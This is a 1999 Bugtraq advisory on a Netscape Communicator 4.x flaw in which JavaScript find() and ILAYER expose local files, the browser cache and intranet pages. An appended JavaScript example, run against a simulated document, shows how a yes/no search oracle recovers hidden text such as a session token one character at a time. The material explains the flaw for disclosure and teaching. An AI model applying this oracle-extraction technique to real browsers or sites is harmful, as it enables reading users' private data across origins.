Date: Mon, 8 Mar 1999 19:48:05 +0200
From: Georgi Guninski
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator find() vulnerabilities

There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I guess all 4.x versions are vulnerable) which allows the following security exploits:

*) Reading the parsed content of local HTML files (by 'parsed' I mean the text the user sees, not the actual HTML source)
*) Reading the parsed content of HTML files on a web server blocked by a firewall (the browser and the web server must be on the same side of the firewall)
*) Reading the user's cache
*) Browsing directories
*) Probably others

The exploits use the JavaScript find() function and the ILAYER tag. This may also be exploited through an HTML mail message.

Workaround: Disable JavaScript

Demonstration is available at: http://www.nat.bg/~joro/nsfind.html

-----------HTML code-------------
MBEGIN
MEND
---------------------------------

-----------HTML code-------------
MBEGIN
MEND
---------------------------------

Regards,
Georgi Guninski
http://www.nat.bg/~joro
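The advisory's demo code is not reproduced on this page, so the following is an added example (not Guninski's code and not Netscape's) that models the class of leak it describes: a boolean text-search oracle turned into a character-by-character read of a document the script is not allowed to access directly. It assumes the find() oracle behaves like Netscape's window.find(): it returns true when the string occurs in the rendered text of the page, including text inside an ILAYER that loaded a local file, cached page or directory listing. The oracle here is simulated over a constructed sample document so the logic runs offline in Node; in the browser of 1999 the simulated function would be replaced by window.find() after the target document had been loaded into the ILAYER. Names such as ALPHABET, SAMPLE_DOCUMENT and extractAfter are the example's own.

```javascript
// Added example: extracting rendered text through a boolean "find" oracle.
// Not the advisory's demo code; a model of the technique it describes.

// Characters to try when extending a known prefix. Restricting the alphabet
// bounds the number of oracle calls per recovered character.
const ALPHABET = ' abcdefghijklmnopqrstuvwxyz0123456789./:=-_';

// Constructed sample "parsed" document text, standing in for what the browser
// would render from a local file, a cached page, or an intranet page.
const SAMPLE_DOCUMENT = 'welcome back user=joro session=abc123 balance 42';

// Build an oracle with the assumed semantics of window.find(str): true iff
// the string occurs somewhere in the rendered text. Case-insensitive, which
// is what a default (non case-sensitive) find() would give.
function makeFindOracle(text) {
  const haystack = text.toLowerCase();
  return (needle) => haystack.includes(needle.toLowerCase());
}

// Given a seed known (or guessed) to appear in the document, extend it one
// character at a time. Each recovered character costs at most
// alphabet.length oracle calls. Stops when no extension matches (end of
// text, or a character outside the alphabet) or when maxLen is reached.
// If the prefix occurs more than once, the first matching branch in alphabet
// order is followed; the result is still a real substring of the document.
function extractAfter(find, seed, maxLen, alphabet = ALPHABET) {
  if (!find(seed)) return null; // seed not present, nothing to extend
  let known = seed;
  while (known.length < maxLen) {
    let extended = false;
    for (const ch of alphabet) {
      if (find(known + ch)) {
        known += ch;
        extended = true;
        break;
      }
    }
    if (!extended) break;
  }
  return known;
}

// Wrap the oracle to count queries: the attacker's cost is one find() call
// per query, which is what makes a small alphabet matter.
function extractWithCount(find, seed, maxLen) {
  let calls = 0;
  const counted = (s) => { calls++; return find(s); };
  const result = extractAfter(counted, seed, maxLen);
  return { result, calls };
}

// Usage: recover what follows "session=" in the sample document.
const oracle = makeFindOracle(SAMPLE_DOCUMENT);
const { result, calls } = extractWithCount(oracle, 'session=', 64);
console.log(result, 'recovered with', calls, 'oracle queries');
```

The point the example makes is that a search primitive which only answers yes or no is still a full read primitive once it can be asked repeatedly against content from another origin; the same reasoning applies to any cross-origin boolean side channel, which is why the advisory's only workaround is to disable JavaScript entirely.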